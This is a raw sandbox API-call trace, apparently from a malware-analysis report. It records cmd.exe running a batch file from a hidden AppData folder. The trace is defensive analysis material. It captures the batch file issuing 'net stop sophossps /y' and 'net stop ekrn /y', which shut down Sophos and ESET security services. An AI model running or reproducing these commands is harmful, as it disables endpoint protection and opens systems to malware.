hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0217.214] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.214] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1723 [0217.214] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x19e, lpOverlapped=0x0) returned 1 [0217.214] SetFilePointer (in: hFile=0x74, lDistanceToMove=5946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x173a [0217.214] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=23, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop sophossps /y\r\ny\r\nC /y\r\ntor /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 23 [0217.215] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.215] GetFileType (hFile=0x74) returned 0x1 [0217.215] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.215] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x173a [0217.215] GetProcessHeap () returned 0x3e0000 [0217.215] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0217.215] GetProcessHeap () returned 0x3e0000 [0217.215] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0217.218] _tell (_FileHandle=3) returned 5946 [0217.219] _close (_FileHandle=3) returned 0 [0217.219] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0217.219] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0217.219] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0217.219] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0217.219] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0217.219] _wcsicmp (_String1="net", _String2="CD") returned 11 [0217.219] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0217.219] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0217.219] _wcsicmp (_String1="net", _String2="REN") returned -4 [0217.219] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0217.219] _wcsicmp (_String1="net", _String2="SET") returned -5 [0217.219] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0217.219] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0217.219] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0217.219] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0217.219] _wcsicmp (_String1="net", _String2="MD") returned 1 [0217.219] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0217.219] _wcsicmp (_String1="net", _String2="RD") returned -4 [0217.219] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0217.219] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0217.219] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0217.219] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0217.219] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0217.219] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0217.219] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0217.219] _wcsicmp (_String1="net", _String2="VER") returned -8 [0217.219] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0217.219] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0217.219] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0217.219] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0217.219] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0217.219] _wcsicmp (_String1="net", _String2="START") returned -5 [0217.219] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0217.220] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0217.220] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0217.220] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0217.220] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0217.220] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0217.220] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0217.220] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0217.220] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0217.220] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0217.220] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0217.220] SetErrorMode (uMode=0x0) returned 0x1 [0217.220] GetProcessHeap () returned 0x3e0000 [0217.220] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0217.220] GetProcessHeap () returned 0x3e0000 [0217.220] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0217.221] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.221] GetProcessHeap () returned 0x3e0000 [0217.221] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0217.221] GetProcessHeap () returned 0x3e0000 [0217.221] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0217.221] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0217.221] GetProcessHeap () returned 0x3e0000 [0217.221] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0217.221] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.221] GetProcessHeap () returned 0x3e0000 [0217.221] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0217.222] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0217.222] GetProcessHeap () returned 0x3e0000 [0217.222] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0217.222] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.222] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.223] GetLastError () returned 0x2 [0217.223] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.223] GetLastError () returned 0x2 [0217.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.224] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.225] GetLastError () returned 0x2 [0217.225] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.225] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.225] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.226] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0217.226] SetErrorMode (uMode=0x0) returned 0x1 [0217.226] GetProcessHeap () returned 0x3e0000 [0217.226] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0217.226] GetProcessHeap () returned 0x3e0000 [0217.226] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0217.226] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.227] GetProcessHeap () returned 0x3e0000 [0217.227] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0217.227] GetProcessHeap () returned 0x3e0000 [0217.227] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0217.227] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0217.227] GetProcessHeap () returned 0x3e0000 [0217.227] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0217.227] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.227] GetProcessHeap () returned 0x3e0000 [0217.227] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0217.227] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0217.227] GetProcessHeap () returned 0x3e0000 [0217.228] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0217.228] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.228] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.228] GetLastError () returned 0x2 [0217.229] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.229] GetLastError () returned 0x2 [0217.229] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.230] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0217.230] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0217.230] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.230] GetLastError () returned 0x2 [0217.231] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0217.231] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0217.231] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.231] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0217.231] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0217.232] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0217.232] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.232] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop sophossps /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop sophossps /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop sophossps /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xb5c, dwThreadId=0xb4c)) returned 1 [0217.236] CloseHandle (hObject=0x74) returned 1 [0217.236] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.236] GetProcessHeap () returned 0x3e0000 [0217.236] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.236] GetEnvironmentStringsW () returned 0x3f8408* [0217.236] GetProcessHeap () returned 0x3e0000 [0217.236] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.237] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.237] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0217.397] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0217.397] CloseHandle (hObject=0x78) returned 1 [0217.397] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0217.397] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0217.397] GetProcessHeap () returned 0x3e0000 [0217.397] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.397] GetEnvironmentStringsW () returned 0x3f8408* [0217.397] GetProcessHeap () returned 0x3e0000 [0217.397] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.398] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.398] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.398] GetProcessHeap () returned 0x3e0000 [0217.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.398] GetEnvironmentStringsW () returned 0x3f8408* [0217.398] GetProcessHeap () returned 0x3e0000 [0217.398] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.398] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.398] GetProcessHeap () returned 0x3e0000 [0217.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0217.398] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0217.398] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.398] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0217.398] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.398] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0217.399] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.399] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0217.399] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.399] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0217.399] SetConsoleInputExeNameW () returned 0x1 [0217.399] GetConsoleOutputCP () returned 0x1b5 [0217.399] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0217.399] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.399] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0217.400] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0217.400] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.400] SetFilePointer (in: hFile=0x78, lDistanceToMove=5946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x173a [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0217.400] GetProcessHeap () returned 0x3e0000 [0217.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0217.400] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.400] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x173a [0217.401] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x187, lpOverlapped=0x0) returned 1 [0217.401] SetFilePointer (in: hFile=0x78, lDistanceToMove=5964, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x174c [0217.401] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=18, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ekrn /y\r\n /y\r\ny\r\nC /y\r\ntor /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 18 [0217.402] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.402] GetFileType (hFile=0x78) returned 0x1 [0217.402] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.402] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x174c [0217.402] GetProcessHeap () returned 0x3e0000 [0217.402] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0217.402] GetProcessHeap () returned 0x3e0000 [0217.402] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0217.405] _tell (_FileHandle=3) returned 5964 [0217.405] _close (_FileHandle=3) returned 0 [0217.405] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0217.405] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0217.405] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0217.406] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0217.406] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0217.406] _wcsicmp (_String1="net", _String2="CD") returned 11 [0217.406] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0217.406] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0217.406] _wcsicmp (_String1="net", _String2="REN") returned -4 [0217.406] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0217.406] _wcsicmp (_String1="net", _String2="SET") returned -5 [0217.406] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0217.406] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0217.406] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0217.406] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0217.406] _wcsicmp (_String1="net", _String2="MD") returned 1 [0217.406] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0217.406] _wcsicmp (_String1="net", _String2="RD") returned -4 [0217.406] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0217.406] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0217.406] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0217.406] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0217.406] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0217.406] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0217.406] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0217.406] _wcsicmp (_String1="net", _String2="VER") returned -8 [0217.406] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0217.406] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0217.406] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0217.406] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0217.406] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0217.406] _wcsicmp (_String1="net", _String2="START") returned -5 [0217.406] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0217.406] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0217.406] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0217.406] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0217.406] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0217.406] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0217.406] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0217.406] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0217.406] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0217.407] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0217.407] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0217.407] SetErrorMode (uMode=0x0) returned 0x1 [0217.407] GetProcessHeap () returned 0x3e0000 [0217.407] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0217.407] GetProcessHeap () returned 0x3e0000 [0217.407] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0217.407] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.408] GetProcessHeap () returned 0x3e0000 [0217.408] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0217.408] GetProcessHeap () returned 0x3e0000 [0217.408] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0217.408] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0217.408] GetProcessHeap () returned 0x3e0000 [0217.408] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0217.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 